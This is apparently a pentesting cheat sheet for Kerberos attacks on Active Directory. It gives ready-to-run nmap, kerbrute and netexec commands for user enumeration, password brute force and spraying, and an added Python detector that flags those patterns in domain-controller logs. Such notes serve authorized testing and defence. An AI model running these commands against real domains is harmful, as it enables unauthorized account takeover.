
enumeration

Enumerate

nmap --script krb5-enum-users --script-args krb5-enum-users.realm='example.local' -p 88 "$target"

Brute force authentication

# --dc: domain controller
# -d: domain
# combos.txt: the wordlist must contain "username:password" combinations.
kerbrute bruteforce --dc 10.0.0.1 -d example.domain combos.txt

# User enumeration
kerbrute userenum --dc 10.0.0.1 -d example.domain usernames.txt

# Brute force a user's password
kerbrute bruteuser --dc 10.0.0.1 -d example.domain passwords.txt username

Password spraying attack

netexec smb 10.10.11.236 -u users -p users --continue-on-success --no-brute
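On the defending side, Kerberos user enumeration, single-account brute force and spraying each leave a different pattern in the domain controller's Security log: event 4768 with result code 0x6 (unknown principal) and event 4771 with failure code 0x18 (pre-authentication failed). The following is an added example, not part of the original page, that classifies those patterns per source address. The sample events, the threshold of 3 and the `classify` name are assumptions, and the events are assumed to come from a single time window with Kerberos failure auditing enabled.

```python
from collections import defaultdict

# Constructed sample events, reduced to (event_id, client_ip, account, status).
SAMPLE_EVENTS = [
    (4768, "10.0.0.50", "alice", "0x0"),       # normal TGT request
    (4771, "10.0.0.50", "alice", "0x18"),      # one mistyped password
    (4768, "10.0.0.66", "admin1", "0x6"),      # requests for names that do not exist
    (4768, "10.0.0.66", "svc_backup", "0x6"),
    (4768, "10.0.0.66", "jdoe", "0x6"),
    (4768, "10.0.0.66", "test", "0x6"),
    (4771, "10.0.0.77", "alice", "0x18"),      # one failure each across many accounts
    (4771, "10.0.0.77", "bob", "0x18"),
    (4771, "10.0.0.77", "carol", "0x18"),
    (4771, "10.0.0.88", "bob", "0x18"),        # repeated failures on one account
    (4771, "10.0.0.88", "bob", "0x18"),
    (4771, "10.0.0.88", "bob", "0x18"),
    (4771, "10.0.0.88", "bob", "0x18"),
]

UNKNOWN_PRINCIPAL = "0x6"   # KDC_ERR_C_PRINCIPAL_UNKNOWN
PREAUTH_FAILED = "0x18"     # KDC_ERR_PREAUTH_FAILED (wrong password)


def classify(events, threshold=3):
    """Return {client_ip: set of findings} for one time window of events."""
    unknown = defaultdict(set)                      # ip -> nonexistent names requested
    failed = defaultdict(lambda: defaultdict(int))  # ip -> account -> bad-password count
    for event_id, ip, account, status in events:
        if event_id == 4768 and status == UNKNOWN_PRINCIPAL:
            unknown[ip].add(account.lower())
        elif event_id == 4771 and status == PREAUTH_FAILED:
            failed[ip][account.lower()] += 1

    findings = defaultdict(set)
    for ip, names in unknown.items():
        if len(names) >= threshold:                 # many distinct unknown names
            findings[ip].add("user-enumeration")
    for ip, per_account in failed.items():
        if len(per_account) >= threshold:           # failures spread over many accounts
            findings[ip].add("password-spray")
        if max(per_account.values()) >= threshold:  # failures piled on one account
            findings[ip].add("single-account-brute-force")
    return dict(findings)


if __name__ == "__main__":
    for ip, labels in sorted(classify(SAMPLE_EVENTS).items()):
        print(ip, sorted(labels))
```
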

AS-REP Roasting

We might be able to find password hashes of user accounts that do not require preauthentication. Please see AS-REP Roasting.

Kerberoasting attacks
